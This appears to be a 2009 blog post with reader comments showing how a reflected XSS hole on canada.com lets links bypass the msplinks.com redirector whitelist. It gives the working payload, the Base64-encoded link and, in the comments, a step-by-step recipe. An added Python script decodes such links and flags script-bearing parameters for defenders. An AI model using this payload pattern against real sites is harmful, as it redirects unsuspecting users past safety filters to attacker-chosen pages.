The technique I previously blogged about still works, but ytmnd.com has fixed the XSS vulnerability used in that posting. Here's a hole in another Msplinks.com whitelisted site:
http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('
Just as before, 01 is prefixed to the XSS redirect URL, the result is Base64 encoded, and the encoded string is appended to http://www.msplinks.com/.
http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn
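Added example (not code from the blog post): a short Python script that does what a link scanner or incident responder would do with an msplinks-style link. It undoes the construction the post describes (strip the redirector host, Base64-decode, drop the leading "01"), recovers the real destination and its host, and flags any query parameter that carries script-looking content, which is how a "whitelisted" host ends up acting as a springboard. The marker list and the benign comparison link are constructed for this example.

```python
import base64
import binascii
from urllib.parse import urlsplit, parse_qsl

# Redirector format described in the post: host + Base64("01" + destination URL).
MSPLINKS_PREFIX = "http://www.msplinks.com/"

# The link quoted in the post above.
POSTED_LINK = (
    "http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9"
    "Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn"
)

# Constructed for this example: the same whitelisted host with an ordinary search
# term ("01http://www.canada.com/search/search.html?q=hockey", Base64-encoded by hand).
BENIGN_LINK = "http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9aG9ja2V5"

# Substrings that have no business inside a search parameter of a trusted site.
# Illustrative list, not exhaustive.
SCRIPT_MARKERS = ("window.location", "document.", "javascript:", "<script", "onerror=", "eval(")


def decode_msplinks(link):
    """Return the destination URL carried by an msplinks-style link, or None when the
    path is not a valid Base64 token starting with '01' (so junk does not get trusted)."""
    if not link.startswith(MSPLINKS_PREFIX):
        return None
    token = link[len(MSPLINKS_PREFIX):]
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if not raw.startswith("01"):
        return None
    return raw[2:]


def suspicious_params(url):
    """Names of query parameters whose (percent-decoded) value contains a script marker."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        lowered = value.lower()
        if any(marker in lowered for marker in SCRIPT_MARKERS):
            hits.append(name)
    return hits


def inspect_link(link):
    """Decode a redirector link and report the real host plus any suspicious parameters."""
    dest = decode_msplinks(link)
    if dest is None:
        return {"destination": None, "host": None, "suspicious": [], "verdict": "not a 01+Base64 token"}
    hits = suspicious_params(dest)
    verdict = "whitelisted host abused via reflected parameter" if hits else "plain redirect to whitelisted host"
    return {"destination": dest, "host": urlsplit(dest).hostname, "suspicious": hits, "verdict": verdict}


if __name__ == "__main__":
    for link in (POSTED_LINK, BENIGN_LINK):
        for key, value in inspect_link(link).items():
            print(f"{key}: {value}")
        print()
```

The point the report makes visible is that a host whitelist on the redirector is only as strong as the weakest page on each whitelisted host: both links resolve to www.canada.com, and only the decoded query string tells them apart.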
Sunday, October 4, 2009
If you could tell us noobs what you said, then I'd be happy.

Sure thing. What are you hung up on?

"01 is prefixed to the XSS redirect URL"

Not really sure what this means, as I'm new to the java world. I've seen how XSS affects sites when scripts are placed into search bars, but to redirect using whitelisted sites, tough.

"the result is Base64 encoded and appended"

I'm guessing after encoding we add the code to Msplink.com/

I'm stuck at the first part.

It's pretty simple. In this example you would base64 encode 01http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('

And you have step two correct.
I like this post. Although I haven't studied this, I love writing code and learning about information technology.